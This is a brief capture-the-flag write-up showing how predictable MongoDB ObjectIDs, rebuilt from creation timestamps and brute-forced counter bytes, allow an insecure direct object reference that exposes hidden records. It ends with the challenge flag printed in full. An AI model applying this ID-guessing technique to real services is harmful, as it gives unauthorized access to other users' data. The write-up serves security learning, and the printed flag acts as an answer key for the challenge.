try item/5e70da94d7b1600013655bc0 -> error

in item we have:

5e70da94d7b1600013655bb5
5e7e4f48d7b1600013655bb9
5e83642bd7b1600013655bba
5e8ee635d7b1600013655bbd

after searches -> magondb objectID:

a 4-byte timestamp value, representing the ObjectId’s creation, measured in seconds since the Unix epoch
a 5-byte random value
a 3-byte incrementing counter, initialized to a random value

with creation date we got flag object ID:

Sat Mar 21 2020 09:13:22 -> 03/21/2020 05:13:22
Mon Apr 13 2020 15:50:18 -> 04/13/2020 11:50:18

date "+%s" -d "03/21/2020 05:13:22" -> 1584782002 = 5E75DAB2
date "+%s" -d "04/13/2020 11:50:18" -> 1586793018 = 5E948A3A

manually bf 3 last bytes from bb0 to bbf

5e75dab2d7b1600013655bb8 -> shkCTF{IDOR_IS_ALS0_
5e948a3ad7b1600013655bbf -> P0SSIBLE_W1TH_CUST0M_ID!_f878b1c38e20617a8fbd20d97524a515}

shkCTF{IDOR_IS_ALS0_P0SSIBLE_W1TH_CUST0M_ID!_f878b1c38e20617a8fbd20d97524a515}
